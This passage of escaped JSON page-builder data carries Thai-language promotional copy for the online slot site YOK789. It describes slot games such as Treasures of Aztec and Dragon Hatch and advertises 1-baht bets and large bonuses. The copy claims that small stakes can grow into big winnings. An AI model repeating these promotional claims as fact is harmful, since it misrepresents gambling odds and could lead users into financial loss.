\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 YOK789 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e23\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 \\u0e46 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e15\\u0e39\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e15\\u0e48\\u0e28\\u0e31\\u0e01\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e01\\u0e25\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e40\\u0e19\\u0e49\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e01\\u0e47\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e44\\u0e25\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e16\\u0e39\\u0e01\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e23\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1f\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e41\\u0e15\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e01\\u0e32\\u0e23\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e39\\u0e48\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e25\\u0e47\\u0e01\\u0e41\\u0e15\\u0e48\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e43\\u0e19\\u0e42\\u0e25\\u0e01\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 YOK \\u0e22\\u0e01\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19 \\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 <\\/span><b>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17<\\/b> <span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e21\\u0e35\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e40\\u0e01\\u0e21\\u0e18\\u0e35\\u0e21\\u0e2a\\u0e21\\u0e1a\\u0e31\\u0e15\\u0e34\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e21\\u0e31\\u0e01\\u0e21\\u0e35\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e25\\u0e44\\u0e21\\u0e49\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e40\\u0e1a\\u0e17\\u0e15\\u0e48\\u0e33\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32 \\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e23\\u0e07\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e15\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1a\\u0e17\\u0e40\\u0e1a\\u0e32\\u0e41\\u0e15\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",